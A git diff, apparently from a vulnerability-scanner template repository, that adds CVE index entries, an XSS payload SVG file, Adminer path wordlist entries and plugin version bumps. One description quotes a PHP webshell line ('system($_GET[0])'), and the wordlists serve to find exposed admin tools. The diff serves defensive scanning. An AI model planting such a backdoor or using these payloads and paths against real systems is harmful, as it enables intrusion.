existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4434.yaml"} {"ID":"CVE-2024-4443","Info":{"Name":"Business Directory Plugin \u003c= 6.4.2 - SQL Injection","Severity":"critical","Description":"The Business Directory Plugin Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the ‘listingfields’ parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-4443.yaml"} @@ -2583,9 +2588,11 @@ {"ID":"CVE-2024-45195","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"high","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45195.yaml"} {"ID":"CVE-2024-45241","Info":{"Name":"CentralSquare CryWolf - Path Traversal","Severity":"high","Description":"A traversal vulnerability in GeneralDocs.aspx in CentralSquare CryWolf (False Alarm Management) through 2024-08-09 allows unauthenticated attackers to read files outside of the working web directory via the rpt parameter, leading to the disclosure of sensitive information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45241.yaml"} {"ID":"CVE-2024-45388","Info":{"Name":"Hoverfly \u003c 1.10.3 - Arbitrary File Read","Severity":"high","Description":"Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-45388.yaml"} +{"ID":"CVE-2024-45440","Info":{"Name":"Drupal 11.x-dev - Full Path Disclosure","Severity":"medium","Description":"core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-45440.yaml"} {"ID":"CVE-2024-45507","Info":{"Name":"Apache OFBiz - Remote Code Execution","Severity":"critical","Description":"Apache OFBiz below 18.12.16 is vulnerable to unauthenticated remote code execution on Linux and Windows. An attacker with no valid credentials can exploit missing view authorization checks in the web application to execute arbitrary code on the server\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45507.yaml"} {"ID":"CVE-2024-45622","Info":{"Name":"ASIS - SQL Injection Authentication Bypass","Severity":"critical","Description":"ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-45622.yaml"} {"ID":"CVE-2024-4577","Info":{"Name":"PHP CGI - Argument Injection","Severity":"critical","Description":"PHP CGI - Argument Injection (CVE-2024-4577) is a critical argument injection flaw in PHP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4577.yaml"} +{"ID":"CVE-2024-46627","Info":{"Name":"DATAGERRY - REST API Auth Bypass","Severity":"critical","Description":"Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-46627.yaml"} {"ID":"CVE-2024-46986","Info":{"Name":"Camaleon CMS \u003c 2.8.1 Arbitrary File Write to RCE","Severity":"critical","Description":"An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-46986.yaml"} {"ID":"CVE-2024-47062","Info":{"Name":"Navidrome \u003c 0.53.0 - Authenticated SQL Injection","Severity":"critical","Description":"Navidrome is an open source web-based music collection server and streamer. Navidrome automatically adds parameters in the URL to SQL queries. This can be exploited to access information by adding parameters like `password=...` in the URL (ORM Leak). Furthermore, the names of the parameters are not properly escaped, leading to SQL Injections. Finally, the username is used in a `LIKE` statement, allowing people to log in with `%` instead of their username. When adding parameters to the URL, they are automatically included in an SQL `LIKE` statement (depending on the parameter's name). This allows attackers to potentially retrieve arbitrary information. For example, attackers can use the following request to test whether some encrypted passwords start with `AAA`. This results in an SQL query like `password LIKE 'AAA%'`, allowing attackers to slowly brute-force passwords. When adding parameters to the URL, they are automatically added to an SQL query. The names of the parameters are not properly escaped. This behavior can be used to inject arbitrary SQL code (SQL Injection). These vulnerabilities can be used to leak information and dump the contents of the database and have been addressed in release version 0.53.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-47062.yaml"} {"ID":"CVE-2024-4836","Info":{"Name":"Edito CMS - Sensitive Data Leak","Severity":"high","Description":"Web services managed by Edito CMS (Content Management System) in versions from 3.5 through 3.25 leak sensitive data as they allow downloading configuration files by an unauthorized user.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-4836.yaml"} @@ -2599,6 +2606,7 @@ {"ID":"CVE-2024-5315","Info":{"Name":"Dolibarr ERP CMS `list.php` - SQL Injection","Severity":"critical","Description":"Vulnerabilities in Dolibarr ERP - CRM that affect version 9.0.1 and allow SQL injection.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-5315.yaml"} {"ID":"CVE-2024-5420","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","Severity":"high","Description":"A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2024/CVE-2024-5420.yaml"} {"ID":"CVE-2024-5421","Info":{"Name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - File Exposure","Severity":"high","Description":"A vulnerability was identified in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, impacting the file handling functions. This flaw results in authenticated file disclosure, granting unauthorized access to sensitive files and directories. Although authentication is required, the vulnerability poses a significant risk of data exposure. This vulnerability is publicly disclosed and identified as CVE-2024-5421.\n","Classification":{"CVSSScore":"8.7"}},"file_path":"http/cves/2024/CVE-2024-5421.yaml"} +{"ID":"CVE-2024-5488","Info":{"Name":"SEOPress \u003c 7.9 - Authentication Bypass","Severity":"critical","Description":"The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5488.yaml"} {"ID":"CVE-2024-5522","Info":{"Name":"WordPress HTML5 Video Player \u003c 2.5.27 - SQL Injection","Severity":"critical","Description":"The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5522.yaml"} {"ID":"CVE-2024-5765","Info":{"Name":"WpStickyBar \u003c= 2.1.0 - SQL Injection","Severity":"high","Description":"The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-5765.yaml"} {"ID":"CVE-2024-5827","Info":{"Name":"Vanna - SQL injection","Severity":"critical","Description":"Vanna v0.3.4 is vulnerable to SQL injection in its DuckDB integration exposed to its Flask Web APIs. Attackers can inject malicious SQL training data and generate corresponding queries to write arbitrary files on the victim's file system, such as backdoor.php with contents `\u003c?php system($_GET[0]); ?\u003e`. This can lead to command execution or the creation of backdoors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-5827.yaml"} @@ -2614,6 +2622,7 @@ {"ID":"CVE-2024-6289","Info":{"Name":"WPS Hide Login \u003c 1.9.16.4 - Hidden Login Page Disclosure","Severity":"medium","Description":"The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6289.yaml"} {"ID":"CVE-2024-6366","Info":{"Name":"User Profile Builder \u003c 3.11.8 - File Upload","Severity":"high","Description":"The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6366.yaml"} {"ID":"CVE-2024-6396","Info":{"Name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","Severity":"critical","Description":"A vulnerability in the `_backup_run` function in aimhubio/aim version 3.19.3 allows remote attackers to overwrite any file on the host server and exfiltrate arbitrary data. The vulnerability arises due to improper handling of the `run_hash` and `repo.path` parameters, which can be manipulated to create and write to arbitrary file paths. This can lead to denial of service by overwriting critical system files, loss of private data, and potential remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-6396.yaml"} +{"ID":"CVE-2024-6517","Info":{"Name":"Contact Form 7 Math Captcha \u003c= 2.0.1 - Cross-site Scripting","Severity":"medium","Description":"The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-6517.yaml"} {"ID":"CVE-2024-6586","Info":{"Name":"Lightdash v0.1024.6 - Server-Side Request Forgery","Severity":"high","Description":"Server-Side Request Forgery (“SSRF”) in the export dashboard functionality of Lightdash version 0.1024.6 allows remote authenticated threat actors to obtain the session cookie of any user who exports a crafted dashboard. When they are exported, dashboards containing HTML elements can trigger HTTP requests to an external domain that contain the exporting user’s session cookie. The cookie could be stolen by a threat actor and used to hijack application user sessions.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-6586.yaml"} {"ID":"CVE-2024-6587","Info":{"Name":"LiteLLM - Server-Side Request Forgery","Severity":"high","Description":"LiteLLM vulnerable to Server-Side Request Forgery (SSRF) vulnerability Exposes OpenAI API Keys.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-6587.yaml"} {"ID":"CVE-2024-6646","Info":{"Name":"Netgear-WN604 downloadFile.php - Information Disclosure","Severity":"medium","Description":"There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-6646.yaml"} @@ -2637,7 +2646,9 @@ {"ID":"CVE-2024-7332","Info":{"Name":"TOTOLINK CP450 v4.1.0cu.747_B20191224 - Hard-Coded Password Vulnerability","Severity":"critical","Description":"A critical vulnerability has been discovered in TOTOLINK CP450 version 4.1.0cu.747_B20191224. This vulnerability affects an unknown part of the file /web_cste/cgi-bin/product.ini of the Telnet Service component. The issue stems from the use of a hard-coded password, which can be exploited remotely without any user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7332.yaml"} {"ID":"CVE-2024-7339","Info":{"Name":"TVT DVR Sensitive Device - Information Disclosure","Severity":"medium","Description":"A vulnerability has been found in TVT DVR TD-2104TS-CL, DVR TD-2108TS-HP, Provision-ISR DVR SH-4050A5-5L(MM) and AVISION DVR AV108T and classified as problematic. This vulnerability affects unknown code of the file /queryDevInfo. The manipulation leads to information disclosure.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-7339.yaml"} {"ID":"CVE-2024-7340","Info":{"Name":"W\u0026B Weave Server - Remote Arbitrary File Leak","Severity":"high","Description":"The Weave server API allows remote users to fetch files from a specific directory, but due to a lack of input validation, it is possible to traverse and leak arbitrary files remotely. In various common scenarios, this allows a low-privileged user to assume the role of the server admin.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-7340.yaml"} +{"ID":"CVE-2024-7354","Info":{"Name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","Severity":"medium","Description":"The Ninja Forms WordPress plugin before 3.8.11 does not escape an URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2024/CVE-2024-7354.yaml"} {"ID":"CVE-2024-7593","Info":{"Name":"Ivanti vTM - Authentication Bypass","Severity":"critical","Description":"Incorrect implementation of an authentication algorithm in Ivanti vTM other than versions 22.2R1 or 22.7R2 allows a remote unauthenticated attacker to bypass authentication of the admin panel.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7593.yaml"} +{"ID":"CVE-2024-7714","Info":{"Name":"AI Assistant with ChatGPT by AYS \u003c= 2.0.9 - Unauthenticated AJAX Calls","Severity":"medium","Description":"The plugin lacks sufficient access controls allowing an unauthenticated user to disconnect the plugin from OpenAI, thereby disabling the plugin. Multiple actions are accessible: ays_chatgpt_disconnect, ays_chatgpt_connect, and ays_chatgpt_save_feedback\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2024/CVE-2024-7714.yaml"} {"ID":"CVE-2024-7786","Info":{"Name":"Sensei LMS \u003c 4.24.2 - Email Template Leak","Severity":"high","Description":"The Sensei LMS WordPress plugin before 4.24.2 does not properly protect some its REST API routes, allowing unauthenticated attackers to leak email templates.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-7786.yaml"} {"ID":"CVE-2024-7928","Info":{"Name":"FastAdmin \u003c V1.3.4.20220530 - Path Traversal","Severity":"medium","Description":"A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.20220121. Affected by this issue is some unknown functionality of the file /index/ajax/lang. The manipulation of the argument lang leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.3.4.20220530 is able to address this issue. It is recommended to upgrade the affected component.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-7928.yaml"} {"ID":"CVE-2024-7954","Info":{"Name":"SPIP Porte Plume Plugin - Remote Code Execution","Severity":"critical","Description":"The porte_plume plugin used by SPIP before 4.30-alpha2, 4.2.13, and 4.1.16 is vulnerable to an arbitrary code execution vulnerability. A remote and unauthenticated attacker can execute arbitrary PHP as the SPIP user by sending a crafted HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-7954.yaml"} @@ -2647,6 +2658,7 @@ {"ID":"CVE-2024-8517","Info":{"Name":"SPIP BigUp Plugin - Remote Code Execution","Severity":"critical","Description":"SPIP before 4.3.2, 4.2.16, and 4.1.18 is vulnerable to a command injection issue. A remote and unauthenticated attacker can execute arbitrary operating system commands by sending a crafted multipart file upload HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8517.yaml"} {"ID":"CVE-2024-8522","Info":{"Name":"LearnPress – WordPress LMS - SQL Injection","Severity":"critical","Description":"The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_only_fields' parameter of the /wp-json/learnpress/v1/courses REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8522.yaml"} {"ID":"CVE-2024-8752","Info":{"Name":"WebIQ 2.15.9 - Directory Traversal","Severity":"high","Description":"The Windows version of WebIQ 2.15.9 is affected by a directory traversal vulnerability that allows remote attackers to read any file on the system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-8752.yaml"} +{"ID":"CVE-2024-8877","Info":{"Name":"Riello Netman 204 - SQL Injection","Severity":"critical","Description":"The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-8877.yaml"} {"ID":"CVE-2024-8883","Info":{"Name":"Keycloak - Open Redirect","Severity":"medium","Description":"A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to http://localhost or http://127.0.0.1, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.\n","Classification":{"CVSSScore":"6.8"}},"file_path":"http/cves/2024/CVE-2024-8883.yaml"} {"ID":"CVE-2024-9014","Info":{"Name":"pgAdmin 4 - Authentication Bypass","Severity":"critical","Description":"pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.\n","Classification":{"CVSSScore":"9.9"}},"file_path":"http/cves/2024/CVE-2024-9014.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} @@ -2666,3 +2678,13 @@ {"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} {"ID":"CVE-2022-31793","Info":{"Name":"muhttpd \u003c=1.1.5 - Local Inclusion","Severity":"high","Description":"muhttpd 1.1.5 and before are vulnerable to unauthenticated local file inclusion. The vulnerability allows retrieval of files from the file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2022/CVE-2022-31793.yaml"} {"ID":"CVE-2023-33246","Info":{"Name":"RocketMQ \u003c= 5.1.0 - Remote Code Execution","Severity":"critical","Description":"For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. Several components of RocketMQ, including NameServer, Broker, and Controller, are leaked on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system users that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for using RocketMQ 5.x or 4.9.6 or above for using RocketMQ 4.x .\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2023/CVE-2023-33246.yaml"} +{"ID":"CVE-2012-2122","Info":{"Name":"MySQL - Authentication Bypass","Severity":"medium","Description":"sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.\n","Classification":{"CVSSScore":"5.1"}},"file_path":"javascript/cves/2012/CVE-2012-2122.yaml"} +{"ID":"CVE-2016-8706","Info":{"Name":"Memcached Server SASL Authentication - Remote Code Execution","Severity":"high","Description":"An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"javascript/cves/2016/CVE-2016-8706.yaml"} +{"ID":"CVE-2019-9193","Info":{"Name":"PostgreSQL 9.3-12.3 Authenticated Remote Code Execution","Severity":"high","Description":"In PostgreSQL 9.3 through 11.2, the \"COPY TO/FROM PROGRAM\" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"javascript/cves/2019/CVE-2019-9193.yaml"} +{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"javascript/cves/2020/CVE-2020-7247.yaml"} +{"ID":"CVE-2023-34039","Info":{"Name":"VMWare Aria Operations - Remote Code Execution","Severity":"critical","Description":"VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)\nVersion: All versions from 6.0 to 6.10\n","Classification":{"CVSSScore":"9.8"}},"file_path":"javascript/cves/2023/CVE-2023-34039.yaml"} +{"ID":"CVE-2023-46604","Info":{"Name":"Apache ActiveMQ - Remote Code Execution","Severity":"critical","Description":"Apache ActiveMQ is vulnerable to Remote Code Execution.The vulnerability may allow a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.\nUsers are recommended to upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3, which fixes this issue.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"javascript/cves/2023/CVE-2023-46604.yaml"} +{"ID":"CVE-2023-48795","Info":{"Name":"OpenSSH Terrapin Attack - Detection","Severity":"medium","Description":"The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"javascript/cves/2023/CVE-2023-48795.yaml"} +{"ID":"CVE-2024-23897","Info":{"Name":"Jenkins \u003c 2.441 - Arbitrary File Read","Severity":"high","Description":"Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"javascript/cves/2024/CVE-2024-23897.yaml"} +{"ID":"CVE-2024-45519","Info":{"Name":"Zimbra Collaboration Suite \u003c 9.0.0 - Remote Code Execution","Severity":"critical","Description":"SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system's integrity and confidentiality.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"javascript/cves/2024/CVE-2024-45519.yaml"} +{"ID":"CVE-2024-47176","Info":{"Name":"CUPS - Remote Code Execution","Severity":"high","Description":"CUPS is a standards-based, open-source printing system, and cups-browsed contains network printing functionality including, but not limited to, auto-discovering print services and shared printers. cups-browsed binds to INADDR_ANY-631, causing it to trust any packet from any source, and can cause the Get-Printer-Attributes IPP request to an attacker controlled URL.\nDue to the service binding to *-631 ( INADDR_ANY ), multiple bugs in cups-browsed can be exploited in sequence to introduce a malicious printer to the system. This chain of exploits ultimately enables an attacker to execute arbitrary commands remotely on the target machine without authentication when a print job is started. This poses a significant security risk over the network. Notably, this vulnerability is particularly concerning as it can be exploited from the public internet, potentially exposing a vast number of systems to remote attacks if their CUPS services are enabled.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"javascript/cves/2024/CVE-2024-47176.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 580721f343..0c70731616 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -9fe25cb652f551d9827acd96ea3fe5f5 +34d767d0d4ce4e7d79ac3e12ad34b41b diff --git a/helpers/payloads/retool-xss.svg b/helpers/payloads/retool-xss.svg new file mode 100644 index 0000000000..de449b2d48 --- /dev/null +++ b/helpers/payloads/retool-xss.svg @@ -0,0 +1,8 @@ + + + + + + diff --git a/helpers/wordlists/adminer-paths.txt b/helpers/wordlists/adminer-paths.txt index 35fe9c3808..7e2818dc9c 100644 --- a/helpers/wordlists/adminer-paths.txt +++ b/helpers/wordlists/adminer-paths.txt @@ -735,8 +735,43 @@ /php/adminer.php /phpmyadmin.php /public/adminer.php +/public/adminer/ /sql.php /tools/adminer.php /web/adminer.php /wp-content/plugins/adminer/adminer.php -/modules/sfkdbmanage/adminer.php \ No newline at end of file +/modules/sfkdbmanage/adminer.php +/editor-4.8.1-pl.php +/editor-4.8.1-sk.php +/editor-4.8.1.php +/editor-4.8.1-cs.php +/editor-4.8.1-de.php +/editor-4.8.1-en.php +/editor-4.8.1-mysql-cs.php +/editor-4.8.1-mysql-de.php +/editor-4.8.1-mysql-en.php +/editor-4.8.1-mysql-pl.php +/editor-4.8.1-mysql-sk.php +/editor-4.8.1-mysql.php +/adminer-4.8.1-cs.php +/adminer-4.8.1-de.php +/adminer-4.8.1-en.php +/adminer-4.8.1-mysql-cs.php +/adminer-4.8.1-mysql-de.php +/adminer-4.8.1-mysql-en.php +/adminer-4.8.1-mysql-pl.php +/adminer-4.8.1-mysql-sk.php +/adminer-4.8.1-mysql.php +/adminer-4.8.1-pl.php +/adminer-4.8.1-sk.php +/adminer-4.8.1.php +/adminer-4.8.1/ +/itlabvietadminer.php +/vendor/phpunit/phpunit/src/Util/PHP/adminer-4.7.7.php +/vendor/phpunit/phpunit/src/Util/PHP/adminer.php +/adminer462.php +/db/adminer.php +/wp-content/themes/twentysixteen/adminer.php +/adminer2.php +/adminer-4.php +/adminer_new.php \ No newline at end of file diff --git a/helpers/wordpress/plugins/ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt index 285a12c5bf..72dd66b70e 100644 --- a/helpers/wordpress/plugins/ad-inserter.txt +++ b/helpers/wordpress/plugins/ad-inserter.txt @@ -1 +1 @@ -2.7.36 \ No newline at end of file +2.7.38 \ No newline at end of file diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index 9d086c6dff..b673f6ac16 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.1.4 \ No newline at end of file +4.1.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-gutenberg.txt b/helpers/wordpress/plugins/disable-gutenberg.txt index 6ebad14888..4fe56315a0 100644 --- a/helpers/wordpress/plugins/disable-gutenberg.txt +++ b/helpers/wordpress/plugins/disable-gutenberg.txt @@ -1 +1 @@ -3.1.2 \ No newline at end of file +3.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt 